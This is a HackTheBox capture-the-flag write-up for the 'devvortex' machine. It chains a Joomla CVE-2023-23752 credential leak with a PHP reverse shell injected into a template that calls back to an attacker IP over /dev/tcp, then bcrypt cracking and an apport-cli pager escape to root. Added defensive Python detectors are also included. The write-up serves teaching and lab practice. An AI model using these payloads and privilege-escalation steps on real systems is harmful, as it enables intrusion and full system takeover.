HTB: devvortex Writeup


Machine Information

| Attribute | Details |
| --- | --- |
| Name | devvortex |
| OS | Linux |
| Difficulty | Easy |
| Points | 20 |
| Release Date | N/A |
| IP Address | devvortex.htb |
| Author | D3vnomi |

Machine Rating

⭐⭐⭐⭐☆ (7.5/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐⭐☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐⭐☆☆
  • CTF-like: ⭐⭐⭐☆☆

Summary

devvortex is an Easy-difficulty Linux machine that requires thorough web enumeration and exploitation of a Joomla vulnerability chain. The attack path leverages CVE-2023-23752 (Joomla information disclosure) to extract admin credentials, gains code execution through template injection, and escalates privileges via a pager escape vulnerability in apport-cli.

TL;DR: Subdomain enumeration → Joomla discovery → CVE-2023-23752 exploitation → Admin credentials → PHP reverse shell via template → MySQL credential extraction → User SSH access → apport-cli pager escape → Root.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- devvortex.htb

Results:

The target runs a web server on port 80 (HTTP). Further enumeration of the primary domain and subdomains is necessary.

Service Enumeration

Primary Hostname: devvortex.htb

Add to /etc/hosts:

echo "10.10.11.17 devvortex.htb" >> /etc/hosts

Directory and Subdomain Enumeration

Perform initial directory brute-forcing on the main domain:

gobuster dir -u http://devvortex.htb -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u http://devvortex.htb -w /usr/share/wordlists/dirb/common.txt -r

Then enumerate subdomains:

ffuf -u http://devvortex.htb -H "Host: FUZZ.devvortex.htb" -w /usr/share/wordlists/subdomains-top1million-5000.txt -fc 404
# FUZZ goes in the Host header so each candidate is tested as a virtual host
# on the known IP instead of relying on DNS resolution; if every miss shares
# one status code or size, filter on that with -fc/-fs instead.

Findings:

  • Discovered dev.devvortex.htb subdomain
  • Add to /etc/hosts: echo "10.10.11.17 dev.devvortex.htb" >> /etc/hosts

Further enumeration of the subdomain reveals key directories:

feroxbuster -u http://dev.devvortex.htb -w /usr/share/wordlists/dirb/common.txt -r

Key Discoveries:

  • /administrator/ — Joomla admin panel
  • /api/ — API endpoint

Application Identification

Use joomscan to identify the Joomla version:

joomscan -u http://dev.devvortex.htb

Results:

  • Joomla Version: 4.2.6
  • Status: Vulnerable to CVE-2023-23752 (Information Disclosure)

Vulnerability Assessment

Identified Vulnerabilities:

  • CVE-2023-23752 — Joomla information disclosure allowing extraction of sensitive configuration data (credentials, database names)
  • Joomla 4.2.6 — This version is explicitly vulnerable to the above CVE

Initial Foothold

Exploitation: CVE-2023-23752

The vulnerability allows unauthenticated access to sensitive API endpoints, specifically /api/index.php/v1/users and /api/index.php/v1/config, which leak credentials and system information.

Step 1: Extract Admin Credentials

Access the vulnerable API endpoint:

curl -s "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true" | jq .

Response (partial):

{
  "dbtype": "mysqli",
  "host": "localhost",
  "user": "lewis",
  "password": "P4ntherg0t1n5r3c0n##",
  "db": "joomla",
  ...
}

Credentials obtained:

  • Username: lewis
  • Password: P4ntherg0t1n5r3c0n##
  • Database: joomla
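As an added defender-side example (not part of the original writeup), the following Python script scans web server access log lines in combined format for the two unauthenticated API routes named above being queried with public=true, and reports whether the request succeeded. The log lines are constructed; the probing address reuses the writeup's 10.10.14.25.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Joomla API routes that CVE-2023-23752 exposes without authentication
# (the two named in the writeup); matched as path prefixes.
SENSITIVE_ROUTES = (
    "/api/index.php/v1/config/application",
    "/api/index.php/v1/users",
)

# Combined log format (Apache/nginx default).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_cve_2023_23752_probe(entry):
    """True when the request targets a leaky v1 route with public=true."""
    if entry is None:
        return False
    url = urlsplit(entry["target"])
    if not url.path.startswith(SENSITIVE_ROUTES):
        return False
    qs = parse_qs(url.query)
    return qs.get("public", [""])[0].lower() == "true"

def scan_access_log(lines):
    """Return (ip, path, status) per probe; status 200 means the leak succeeded."""
    hits = []
    for line in lines:
        e = parse_line(line)
        if is_cve_2023_23752_probe(e):
            hits.append((e["ip"], urlsplit(e["target"]).path, int(e["status"])))
    return hits

# Constructed sample lines (not captured from the target).
SAMPLE_LOG = [
    '10.10.14.25 - - [08/Mar/2026:10:01:02 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1243',
    '10.10.14.25 - - [08/Mar/2026:10:01:05 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 872',
    '10.10.14.25 - - [08/Mar/2026:10:01:09 +0000] "GET /administrator/ HTTP/1.1" 200 12043',
    '10.10.14.30 - - [08/Mar/2026:10:02:00 +0000] "GET /api/index.php/v1/content/articles?public=true HTTP/1.1" 200 3410',
    '10.10.14.31 - - [08/Mar/2026:10:03:00 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    for ip, path, status in scan_access_log(SAMPLE_LOG):
        print(f"{ip} requested {path} -> {status}")
```

The articles route is a legitimately public endpoint, so it is not flagged; a 403 on a sensitive route shows the probe was attempted but blocked.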

Step 2: Access Admin Panel

Navigate to the Joomla admin panel:

http://dev.devvortex.htb/administrator/

Log in with the extracted credentials (lewis / P4ntherg0t1n5r3c0n##).

Step 3: Inject PHP Reverse Shell via Template

Within the Joomla admin panel:

  1. Navigate to System → Templates → Manage Templates
  2. Select the atum template (or another active template)
  3. Open the index.php file for editing

Inject the PHP reverse shell payload at the beginning of the file:

<?php
system('bash -c "bash -i >& /dev/tcp/10.10.14.25/1337 0>&1"');
?>

Save the template.

Step 4: Trigger Code Execution

Open a netcat listener on your attack machine:

nc -lvnp 1337

Visit the template URL to trigger the PHP execution:

curl http://dev.devvortex.htb/
# Or navigate to the admin panel URL

Result: Shell as www-data user.
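Added example, not the writeup's or Joomla's own code: a small file-integrity check that baselines the template tree's PHP files by SHA-256 and reports added, modified or deleted files, listing any shell-spawning PHP calls (or a /dev/tcp/ string) found in them. The demo() scenario and the atum/index.php stand-in are constructed; the injected line uses system('id') as a placeholder for the payload shown above.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# PHP calls that have no business in a template's index.php; the writeup's
# payload is a system() call that spawns a bash /dev/tcp reverse shell.
SUSPICIOUS = re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(|/dev/tcp/")

def build_baseline(root):
    """Relative path -> sha256 for every .php file under the templates root."""
    root = Path(root)
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*.php")}

def check_templates(root, baseline):
    """Diff the tree against the baseline; return (path, status, suspicious_tokens)."""
    root = Path(root)
    current = build_baseline(root)
    findings = []
    for rel, digest in current.items():
        if rel in baseline and baseline[rel] == digest:
            continue
        status = "modified" if rel in baseline else "added"
        text = (root / rel).read_text(errors="replace")
        tokens = sorted({m.group(0).split("(")[0].strip() for m in SUSPICIOUS.finditer(text)})
        findings.append((rel, status, tokens))
    for rel in baseline.keys() - current.keys():
        findings.append((rel, "deleted", []))
    return sorted(findings)

def demo():
    """Constructed scenario: baseline a clean admin template, then tamper with it."""
    with tempfile.TemporaryDirectory() as tmp:
        atum = Path(tmp) / "atum"
        atum.mkdir()
        (atum / "index.php").write_text("<?php defined('_JEXEC') or die; ?>\n<html></html>\n")
        (atum / "error.php").write_text("<?php defined('_JEXEC') or die; ?>\n")
        baseline = build_baseline(tmp)
        # Stand-in for the injected payload (a system() call at the top of the file).
        (atum / "index.php").write_text("<?php system('id'); ?>\n" + (atum / "index.php").read_text())
        (atum / "shell.php").write_text("<?php passthru($_GET['c']); ?>\n")
        (atum / "error.php").unlink()
        return check_templates(tmp, baseline)

if __name__ == "__main__":
    for rel, status, tokens in demo():
        print(f"{status:8} {rel}  suspicious={tokens}")
```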


User Compromise

Credential Discovery via Database Access

After obtaining the www-data shell, enumerate the system to find the MySQL credentials from the Joomla configuration.

Step 1: Stabilize the Shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Step 2: Connect to MySQL

Using the credentials extracted earlier (lewis / P4ntherg0t1n5r3c0n##):

mysql -h localhost -u lewis -p joomla

When prompted for password, enter: P4ntherg0t1n5r3c0n##

Step 3: Enumerate Users

Within the MySQL shell:

SHOW TABLES;
SELECT * FROM sd4fg_users;

Output:

| id | name | username | email | password | ... |
| --- | --- | --- | --- | --- | --- |
| 649 | Logan | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 | ... |

Extract the bcrypt hash for the logan user.

Step 4: Crack the Password Hash

Save the hash to a file:

echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' > logan_hash.txt

Use hashcat to crack the bcrypt hash:

hashcat -m 3200 -a 0 logan_hash.txt /usr/share/wordlists/rockyou.txt

Result:

  • Username: logan
  • Password: tequieromucho

Step 5: SSH Access

Obtain SSH access as the logan user:

ssh logan@devvortex.htb
# Enter password: tequieromucho

User Flag

cat ~/user.txt

🚩 User Flag: [REDACTED]


Privilege Escalation

Enumeration

After gaining access as logan, perform privilege escalation enumeration:

sudo -l

Output:

User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli

logan can run /usr/bin/apport-cli as any user, including root, through sudo.

Vulnerability Research

Check the version of apport-cli:

apport-cli --version
# or
dpkg -l | grep apport

Version: apport 2.20.11 — Vulnerable to pager escape (CVE-2023-26604 and similar)

apport-cli pipes reports through a pager (typically less) when the V (view) option is chosen. Because the pager inherits the root privileges sudo granted to apport-cli, its ! command spawns a shell as root, so the invoking user can run arbitrary commands with escalated privileges.
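Added example (not from the writeup): a Python audit of sudoers-style rules that flags commands known to hand their output to a pager, which is the condition the escape above and the two exploitation methods below depend on. The sudoers text is constructed; the logan line mirrors the sudo -l output above, and PAGER_CAPABLE is an assumed, illustrative list rather than a complete one.

```python
import re
# Commands that hand output to a pager or editor: a sudo rule for any of them
# gives the caller a root shell via "!" (the writeup does this through
# apport-cli's V option). Illustrative list, not exhaustive.
PAGER_CAPABLE = {
    "/usr/bin/apport-cli": "shows crash reports in a pager (V option)",
    "/usr/bin/less": "pager; '!' runs a shell command",
    "/usr/bin/more": "pager; '!' runs a shell command",
}

# user host=(runas) [TAG:] command[, command...]
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
                     r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudoers(text):
    """One dict per granted command; comments and Defaults lines are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = RULE_RE.match(line) if line and not line.startswith("Defaults") else None
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            if cmd.strip():  # first token only: argument restrictions do not stop '!'
                rules.append({"who": m.group("who"), "runas": m.group("runas"),
                              "nopasswd": "NOPASSWD:" in m.group("tags"),
                              "cmd": cmd.split()[0]})
    return rules

def audit_pager_escapes(text):
    """(who, cmd, reason) for each rule that grants a pager-capable command."""
    findings = []
    for r in parse_sudoers(text):
        reason = PAGER_CAPABLE.get(r["cmd"])
        if reason:
            findings.append((r["who"], r["cmd"], reason))
    return findings

# Constructed sample; the logan line mirrors the writeup's sudo -l output.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
logan   ALL=(ALL:ALL) /usr/bin/apport-cli
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx, /usr/bin/less /var/log/nginx/error.log
"""

if __name__ == "__main__":
    for who, cmd, reason in audit_pager_escapes(SAMPLE_SUDOERS):
        print(f"{who}: {cmd} -> {reason}")
```

Rules granting ALL are left alone on purpose: they are a larger problem than a pager escape and belong to a different check.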

Exploitation: Pager Escape Method 1 (Crash Report)

Step 1: Generate a Crash Report

Trigger a segmentation fault and let the system capture the crash:

sleep 60 &
SLEEP_PID=$!
sleep 2
kill -SIGSEGV $SLEEP_PID

Alternatively, use any crashing application:

bash -c 'kill -SIGSEGV $$'

Step 2: Open Crash Report with apport-cli

Find the crash report file (typically in /var/crash/):

sudo apport-cli -c /var/crash/sleep.XXXX.crash
# or
sudo apport-cli -f

Step 3: Escape the Pager

When the crash report is displayed:

  1. Press V to open the report in a pager (typically less)
  2. Within the pager, type: !/bin/bash
  3. Press Enter to execute the bash command

Result: Interactive bash shell as root.

Exploitation: Pager Escape Method 2 (File Mode)

Alternatively, you can invoke apport-cli in file mode:

sudo apport-cli -f

When prompted to select a crash report or file:

  1. Select one of the listed crash reports
  2. Press V to view in pager
  3. Type !/bin/bash and press Enter

Result: Interactive bash shell as root.

Root Flag

cat /root/root.txt

🚩 Root Flag: [REDACTED]


Attack Chain Summary

graph TD
A["Subdomain Enumeration<br/>ffuf"] -->|Discovers dev.devvortex.htb| B["Joomla 4.2.6 Identified<br/>joomscan"]
B -->|Vulnerable to CVE-2023-23752| C["API Info Disclosure<br/>Extract Credentials"]
C -->|lewis:P4ntherg0t1n5r3c0n##| D["Admin Panel Access<br/>/administrator/"]
D -->|Template Injection| E["PHP Reverse Shell<br/>www-data Shell"]
E -->|MySQL Access| F["Extract logan Hash<br/>Bcrypt"]
F -->|Crack with hashcat| G["logan Password<br/>tequieromucho"]
G -->|SSH Access| H["User: logan"]
H -->|sudo apport-cli| I["Pager Escape<br/>!/bin/bash"]
I -->|Root Access| J["Privilege Escalation Complete"]

Tools Used

| Tool | Purpose |
| --- | --- |
| nmap | Port scanning and service fingerprinting |
| gobuster | Directory enumeration on primary domain |
| feroxbuster | Recursive directory brute-forcing on subdomains |
| ffuf | Web fuzzing and subdomain enumeration |
| joomscan | Joomla CMS vulnerability scanner and version detection |
| curl | HTTP requests to exploit CVE-2023-23752 API |
| jq | JSON parsing of API responses |
| mysql | Database client for credential extraction |
| hashcat | Bcrypt password hash cracking (mode 3200) |
| ssh | Secure shell access as logan user |
| nc / netcat | Reverse shell listener |
| python3 | Shell stabilization and scripting |

Vulnerability Reference

| # | Vulnerability | Component | Severity | Impact |
| --- | --- | --- | --- | --- |
| 1 | CVE-2023-23752 | Joomla 4.2.6 | High | Unauthenticated information disclosure; leaks database credentials and configuration |
| 2 | PHP Code Injection | Joomla Templates | High | Arbitrary code execution; allows reverse shell injection |
| 3 | Weak Password Hashing | Joomla Database | Medium | Bcrypt hashes crackable via offline attacks (rockyou.txt) |
| 4 | CVE-2023-26604 | apport-cli 2.20.11 | High | Pager escape allowing privilege escalation from sudo access |

Key Learnings

  • Web Enumeration is Critical: Subdomain discovery (dev.devvortex.htb) revealed the vulnerable instance. Always enumerate all subdomains and virtual hosts.
  • API Vulnerabilities: Joomla’s /api/ endpoint was unprotected and leaked sensitive configuration including database credentials. APIs deserve the same security scrutiny as traditional web interfaces.
  • Credential Reuse: Database credentials matched Joomla’s admin account, enabling lateral movement. Monitor credential exposure across systems.
  • Template Injection: CMS template systems can be weaponized for code execution. If admin access is achieved, always consider template/theme injection vectors.
  • Database Access: With database access, extract and crack user password hashes for additional accounts (logan).
  • Privilege Escalation via Pager: Legacy tools like apport-cli have well-known pager escape vulnerabilities. Always test sudo-accessible utilities for pager/editor escape vectors.
  • Bcrypt Cracking: While bcrypt is stronger than MD5, dictionary attacks with tools like hashcat remain viable, especially with large wordlists like rockyou.txt.

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #CVE-2023-23752 #Joomla #apport-cli #PrivEsc